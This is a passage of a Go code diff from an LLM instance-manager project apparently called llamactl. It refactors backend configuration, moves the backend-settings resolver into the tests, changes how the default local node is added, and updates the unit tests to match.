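		TensorParallelSize:   2,
		GPUMemoryUtilization: 0.8,
		EnableLogOutputs:     true,
	}

	// Per the tests: the model is emitted as the first positional argument,
	// followed by flag/value pairs such as "--host localhost" and "--port 8080".
	fmt.Println(opts.BuildCommandArgs())
}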
|
||||
@@ -150,9 +150,7 @@ func LoadConfig(configPath string) (AppConfig, error) {
|
||||
EnableSwagger: false,
|
||||
},
|
||||
LocalNode: "main",
|
||||
Nodes: map[string]NodeConfig{
|
||||
"main": {}, // Local node with empty config
|
||||
},
|
||||
Nodes: map[string]NodeConfig{},
|
||||
Backends: BackendConfig{
|
||||
LlamaCpp: BackendSettings{
|
||||
Command: "llama-server",
|
||||
@@ -217,6 +215,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
|
||||
return cfg, err
|
||||
}
|
||||
|
||||
// If local node is not defined in nodes, add it with default config
|
||||
if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
|
||||
cfg.Nodes[cfg.LocalNode] = NodeConfig{}
|
||||
}
|
||||
|
||||
// 3. Override with environment variables
|
||||
loadEnvVars(&cfg)
|
||||
|
||||
@@ -601,17 +604,3 @@ func getDefaultConfigLocations() []string {
|
||||
|
||||
return locations
|
||||
}
|
||||
|
||||
// GetBackendSettings resolves backend settings
|
||||
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
|
||||
switch backendType {
|
||||
case "llama-cpp":
|
||||
return bc.LlamaCpp
|
||||
case "vllm":
|
||||
return bc.VLLM
|
||||
case "mlx":
|
||||
return bc.MLX
|
||||
default:
|
||||
return BackendSettings{}
|
||||
}
|
||||
}
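
A minimal usage sketch for the resolver above, assuming only the BackendConfig and BackendSettings shapes already shown in this diff:

package main

import (
	"fmt"

	"llamactl/pkg/config"
)

func main() {
	bc := &config.BackendConfig{
		LlamaCpp: config.BackendSettings{Command: "llama-server"},
		VLLM:     config.BackendSettings{Command: "vllm", Args: []string{"serve"}},
	}

	// Known keys return the configured settings; unknown keys fall through
	// to the zero-value BackendSettings, as in the switch above.
	fmt.Println(bc.GetBackendSettings("llama-cpp").Command) // "llama-server"
	fmt.Println(bc.GetBackendSettings("unknown").Command)   // ""
}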
|
||||
|
||||
@@ -7,6 +7,20 @@ import (
|
||||
"testing"
|
||||
)
|
||||
|
||||
// getBackendSettings is a test-local helper that resolves backend settings by type
|
||||
func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
|
||||
switch backendType {
|
||||
case "llama-cpp":
|
||||
return bc.LlamaCpp
|
||||
case "vllm":
|
||||
return bc.VLLM
|
||||
case "mlx":
|
||||
return bc.MLX
|
||||
default:
|
||||
return config.BackendSettings{}
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_Defaults(t *testing.T) {
|
||||
// Test loading config when no file exists and no env vars set
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
@@ -205,29 +219,6 @@ instances:
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_InvalidYAML(t *testing.T) {
|
||||
// Create a temporary config file with invalid YAML
|
||||
tempDir := t.TempDir()
|
||||
configFile := filepath.Join(tempDir, "invalid-config.yaml")
|
||||
|
||||
invalidContent := `
|
||||
server:
|
||||
host: "localhost"
|
||||
port: not-a-number
|
||||
instances:
|
||||
[invalid yaml structure
|
||||
`
|
||||
|
||||
err := os.WriteFile(configFile, []byte(invalidContent), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
_, err = config.LoadConfig(configFile)
|
||||
if err == nil {
|
||||
t.Error("Expected LoadConfig to return error for invalid YAML")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParsePortRange(t *testing.T) {
|
||||
tests := []struct {
|
||||
@@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// Remove the getDefaultConfigLocations test entirely
|
||||
|
||||
func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
// Test that environment variables are properly converted to correct types
|
||||
testCases := []struct {
|
||||
envVar string
|
||||
envValue string
|
||||
checkFn func(*config.AppConfig) bool
|
||||
desc string
|
||||
}{
|
||||
{
|
||||
envVar: "LLAMACTL_PORT",
|
||||
envValue: "invalid-port",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
desc: "invalid port number should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_MAX_INSTANCES",
|
||||
envValue: "not-a-number",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
desc: "invalid max instances should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
||||
envValue: "invalid-bool",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
desc: "invalid boolean should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
||||
envValue: "invalid-range",
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
desc: "invalid port range should keep default",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.desc, func(t *testing.T) {
|
||||
os.Setenv(tc.envVar, tc.envValue)
|
||||
defer os.Unsetenv(tc.envVar)
|
||||
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
|
||||
if !tc.checkFn(&cfg) {
|
||||
t.Errorf("Test failed: %s", tc.desc)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_PartialFile(t *testing.T) {
|
||||
// Test that partial config files work correctly (missing sections should use defaults)
|
||||
tempDir := t.TempDir()
|
||||
configFile := filepath.Join(tempDir, "partial-config.yaml")
|
||||
|
||||
// Only specify server config, instances should use defaults
|
||||
configContent := `
|
||||
server:
|
||||
host: "partial-host"
|
||||
port: 7777
|
||||
`
|
||||
|
||||
err := os.WriteFile(configFile, []byte(configContent), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
|
||||
// Server config should be from file
|
||||
if cfg.Server.Host != "partial-host" {
|
||||
t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
|
||||
}
|
||||
if cfg.Server.Port != 7777 {
|
||||
t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
|
||||
}
|
||||
|
||||
// Instances config should be defaults
|
||||
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
||||
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != -1 {
|
||||
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
bc := &config.BackendConfig{
|
||||
@@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test llama-cpp with Docker
|
||||
settings := bc.GetBackendSettings("llama-cpp")
|
||||
settings := getBackendSettings(bc, "llama-cpp")
|
||||
if settings.Command != "custom-llama" {
|
||||
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
|
||||
}
|
||||
@@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test vLLM without Docker
|
||||
settings = bc.GetBackendSettings("vllm")
|
||||
settings = getBackendSettings(bc, "vllm")
|
||||
if settings.Command != "custom-vllm" {
|
||||
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
|
||||
}
|
||||
@@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
|
||||
}
|
||||
|
||||
// Test MLX
|
||||
settings = bc.GetBackendSettings("mlx")
|
||||
settings = getBackendSettings(bc, "mlx")
|
||||
if settings.Command != "custom-mlx" {
|
||||
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
|
||||
bc := &config.BackendConfig{}
|
||||
|
||||
// Test empty llama-cpp
|
||||
settings := bc.GetBackendSettings("llama-cpp")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
|
||||
// Test empty vLLM
|
||||
settings = bc.GetBackendSettings("vllm")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
|
||||
// Test empty MLX
|
||||
settings = bc.GetBackendSettings("mlx")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command, got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
|
||||
// Test that backend environment variables work correctly
|
||||
@@ -496,20 +375,6 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
|
||||
bc := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
// Test invalid backend type returns empty settings
|
||||
settings := bc.GetBackendSettings("invalid-backend")
|
||||
if settings.Command != "" {
|
||||
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadConfig_LocalNode(t *testing.T) {
|
||||
t.Run("default local node", func(t *testing.T) {
|
||||
@@ -552,8 +417,8 @@ nodes:
|
||||
}
|
||||
|
||||
// Verify nodes map (includes default "main" + worker1 + worker2)
|
||||
if len(cfg.Nodes) != 3 {
|
||||
t.Errorf("Expected 3 nodes (default main + worker1 + worker2), got %d", len(cfg.Nodes))
|
||||
if len(cfg.Nodes) != 2 {
|
||||
t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
|
||||
}
|
||||
|
||||
// Verify local node exists and is empty
|
||||
@@ -579,8 +444,8 @@ nodes:
|
||||
|
||||
// Verify default main node still exists
|
||||
_, exists = cfg.Nodes["main"]
|
||||
if !exists {
|
||||
t.Error("Expected default 'main' node to still exist in nodes map")
|
||||
if exists {
|
||||
t.Error("Default 'main' node should not exist when local_node is overridden")
|
||||
}
|
||||
})
|
||||
|
||||
@@ -612,8 +477,8 @@ nodes:
|
||||
}
|
||||
|
||||
// Verify nodes map includes default "main" + primary + worker1
|
||||
if len(cfg.Nodes) != 3 {
|
||||
t.Errorf("Expected 3 nodes (default main + primary + worker1), got %d", len(cfg.Nodes))
|
||||
if len(cfg.Nodes) != 2 {
|
||||
t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
|
||||
}
|
||||
|
||||
localNode, exists := cfg.Nodes["primary"]
|
||||
|
||||
@@ -3,7 +3,6 @@ package instance
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"net/http/httputil"
|
||||
@@ -124,48 +123,6 @@ func (i *Instance) IsRunning() bool {
|
||||
return i.status.isRunning()
|
||||
}
|
||||
|
||||
func (i *Instance) GetPort() int {
|
||||
opts := i.GetOptions()
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
return opts.LlamaServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
return opts.MlxServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
return opts.VllmServerOptions.Port
|
||||
}
|
||||
}
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func (i *Instance) GetHost() string {
|
||||
opts := i.GetOptions()
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
return opts.LlamaServerOptions.Host
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
return opts.MlxServerOptions.Host
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
return opts.VllmServerOptions.Host
|
||||
}
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// SetOptions sets the options
|
||||
func (i *Instance) SetOptions(opts *Options) {
|
||||
if opts == nil {
|
||||
@@ -198,6 +155,20 @@ func (i *Instance) SetTimeProvider(tp TimeProvider) {
|
||||
}
|
||||
}
|
||||
|
||||
func (i *Instance) GetHost() string {
|
||||
if i.options == nil {
|
||||
return "localhost"
|
||||
}
|
||||
return i.options.GetHost()
|
||||
}
|
||||
|
||||
func (i *Instance) GetPort() int {
|
||||
if i.options == nil {
|
||||
return 0
|
||||
}
|
||||
return i.options.GetPort()
|
||||
}
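
With these accessors, callers no longer switch on backend type to find the address. A short sketch, assuming inst is an *instance.Instance created elsewhere:

// host falls back to "localhost" and port to 0 when no options are set,
// matching the guards above.
host := inst.GetHost()
port := inst.GetPort()
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
_ = healthURL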
|
||||
|
||||
// GetProxy returns the reverse proxy for this instance
|
||||
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
||||
if i.proxy == nil {
|
||||
@@ -266,39 +237,31 @@ func (i *Instance) ShouldTimeout() bool {
|
||||
return i.proxy.shouldTimeout()
|
||||
}
|
||||
|
||||
// getBackendHostPort extracts the host and port from instance options
|
||||
// Returns the configured host and port for the backend
|
||||
func (i *Instance) getBackendHostPort() (string, int) {
|
||||
func (i *Instance) getCommand() string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return "localhost", 0
|
||||
return ""
|
||||
}
|
||||
|
||||
var host string
|
||||
var port int
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if opts.LlamaServerOptions != nil {
|
||||
host = opts.LlamaServerOptions.Host
|
||||
port = opts.LlamaServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if opts.MlxServerOptions != nil {
|
||||
host = opts.MlxServerOptions.Host
|
||||
port = opts.MlxServerOptions.Port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if opts.VllmServerOptions != nil {
|
||||
host = opts.VllmServerOptions.Host
|
||||
port = opts.VllmServerOptions.Port
|
||||
}
|
||||
return opts.BackendOptions.GetCommand(i.globalBackendSettings)
|
||||
}
|
||||
|
||||
func (i *Instance) buildCommandArgs() []string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
if host == "" {
|
||||
host = "localhost"
|
||||
return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
|
||||
}
|
||||
|
||||
func (i *Instance) buildEnvironment() map[string]string {
|
||||
opts := i.GetOptions()
|
||||
if opts == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
return host, port
|
||||
return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
|
||||
}
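
Taken together, process startup now composes everything from BackendOptions rather than per-backend switches. A rough sketch of the flow inside the instance package, using the delegating helpers above (not the literal implementation):

command := inst.getCommand()    // -> opts.BackendOptions.GetCommand(globalBackendSettings)
args := inst.buildCommandArgs() // -> opts.BackendOptions.BuildCommandArgs(globalBackendSettings)
env := inst.buildEnvironment()  // -> opts.BackendOptions.BuildEnvironment(globalBackendSettings, opts.Environment)

cmd := exec.Command(command, args...)
for k, v := range env {
	cmd.Env = append(cmd.Env, k+"="+v)
}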
|
||||
|
||||
// MarshalJSON implements json.Marshaler for Instance
|
||||
@@ -307,21 +270,7 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
|
||||
opts := i.GetOptions()
|
||||
|
||||
// Determine if docker is enabled for this instance's backend
|
||||
var dockerEnabled bool
|
||||
if opts != nil {
|
||||
switch opts.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
|
||||
dockerEnabled = true
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
|
||||
dockerEnabled = true
|
||||
}
|
||||
case backends.BackendTypeMlxLm:
|
||||
// MLX does not support docker currently
|
||||
}
|
||||
}
|
||||
dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
|
||||
|
||||
return json.Marshal(&struct {
|
||||
Name string `json:"name"`
|
||||
|
||||
@@ -3,7 +3,6 @@ package instance_test
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
@@ -35,10 +34,12 @@ func TestNewInstance(t *testing.T) {
|
||||
}
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -56,8 +57,8 @@ func TestNewInstance(t *testing.T) {
|
||||
|
||||
// Check that options were properly set with defaults applied
|
||||
opts := inst.GetOptions()
|
||||
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetPort())
|
||||
@@ -73,61 +74,29 @@ func TestNewInstance(t *testing.T) {
|
||||
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
|
||||
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
|
||||
}
|
||||
}
|
||||
|
||||
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
MLX: config.BackendSettings{
|
||||
Command: "mlx_lm.server",
|
||||
Args: []string{},
|
||||
},
|
||||
VLLM: config.BackendSettings{
|
||||
Command: "vllm",
|
||||
Args: []string{"serve"},
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
// Override some defaults
|
||||
// Test that explicit values override defaults
|
||||
autoRestart := false
|
||||
maxRestarts := 10
|
||||
restartDelay := 15
|
||||
|
||||
options := &instance.Options{
|
||||
optionsWithOverrides := &instance.Options{
|
||||
AutoRestart: &autoRestart,
|
||||
MaxRestarts: &maxRestarts,
|
||||
RestartDelay: &restartDelay,
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
// Mock onStatusChange function
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst2 := instance.New("test-override", backendConfig, globalSettings, optionsWithOverrides, "main", mockOnStatusChange)
|
||||
opts2 := inst2.GetOptions()
|
||||
|
||||
instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that explicit values override defaults
|
||||
if opts.AutoRestart == nil || *opts.AutoRestart {
|
||||
if opts2.AutoRestart == nil || *opts2.AutoRestart {
|
||||
t.Error("Expected AutoRestart to be false (overridden)")
|
||||
}
|
||||
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
|
||||
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
|
||||
}
|
||||
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
|
||||
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
|
||||
if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
|
||||
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -155,10 +124,12 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
initialOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -169,18 +140,20 @@ func TestSetOptions(t *testing.T) {
|
||||
|
||||
// Update options
|
||||
newOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
inst.SetOptions(newOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
if inst.GetPort() != 8081 {
|
||||
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
|
||||
@@ -192,58 +165,6 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestSetOptions_PreservesNodes(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
// Create instance with initial nodes
|
||||
initialOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"worker1": {}},
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst := instance.New("test-instance", backendConfig, globalSettings, initialOptions, "main", mockOnStatusChange)
|
||||
|
||||
// Try to update with different nodes
|
||||
updatedOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
inst.SetOptions(updatedOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
// Nodes should remain unchanged
|
||||
if _, exists := opts.Nodes["worker1"]; len(opts.Nodes) != 1 || !exists {
|
||||
t.Errorf("Expected nodes to contain 'worker1', got %v", opts.Nodes)
|
||||
}
|
||||
|
||||
// Other options should be updated
|
||||
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetProxy(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
@@ -265,10 +186,13 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
Nodes: map[string]struct{}{"main": {}},
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -298,49 +222,29 @@ func TestGetProxy(t *testing.T) {
|
||||
|
||||
func TestMarshalJSON(t *testing.T) {
|
||||
backendConfig := &config.BackendConfig{
|
||||
LlamaCpp: config.BackendSettings{
|
||||
Command: "llama-server",
|
||||
Args: []string{},
|
||||
},
|
||||
MLX: config.BackendSettings{
|
||||
Command: "mlx_lm.server",
|
||||
Args: []string{},
|
||||
},
|
||||
VLLM: config.BackendSettings{
|
||||
Command: "vllm",
|
||||
Args: []string{"serve"},
|
||||
},
|
||||
LlamaCpp: config.BackendSettings{Command: "llama-server"},
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
// Mock onStatusChange function
|
||||
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
|
||||
inst := instance.New("test-instance", backendConfig, globalSettings, options, "main", nil)
|
||||
|
||||
instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange)
|
||||
|
||||
data, err := json.Marshal(instance)
|
||||
data, err := json.Marshal(inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON marshal failed: %v", err)
|
||||
}
|
||||
|
||||
// Check that JSON contains expected fields
|
||||
// Verify by unmarshaling and checking key fields
|
||||
var result map[string]any
|
||||
err = json.Unmarshal(data, &result)
|
||||
if err != nil {
|
||||
if err := json.Unmarshal(data, &result); err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
@@ -350,37 +254,9 @@ func TestMarshalJSON(t *testing.T) {
|
||||
if result["status"] != "stopped" {
|
||||
t.Errorf("Expected status 'stopped', got %v", result["status"])
|
||||
}
|
||||
|
||||
// Check that options are included
|
||||
options_data, ok := result["options"]
|
||||
if !ok {
|
||||
if result["options"] == nil {
|
||||
t.Error("Expected options to be included in JSON")
|
||||
}
|
||||
options_map, ok := options_data.(map[string]interface{})
|
||||
if !ok {
|
||||
t.Error("Expected options to be a map")
|
||||
}
|
||||
|
||||
// Check backend type
|
||||
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
|
||||
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
|
||||
}
|
||||
|
||||
// Check backend options
|
||||
backend_options_data, ok := options_map["backend_options"]
|
||||
if !ok {
|
||||
t.Error("Expected backend_options to be included in JSON")
|
||||
}
|
||||
backend_options_map, ok := backend_options_data.(map[string]any)
|
||||
if !ok {
|
||||
t.Error("Expected backend_options to be a map")
|
||||
}
|
||||
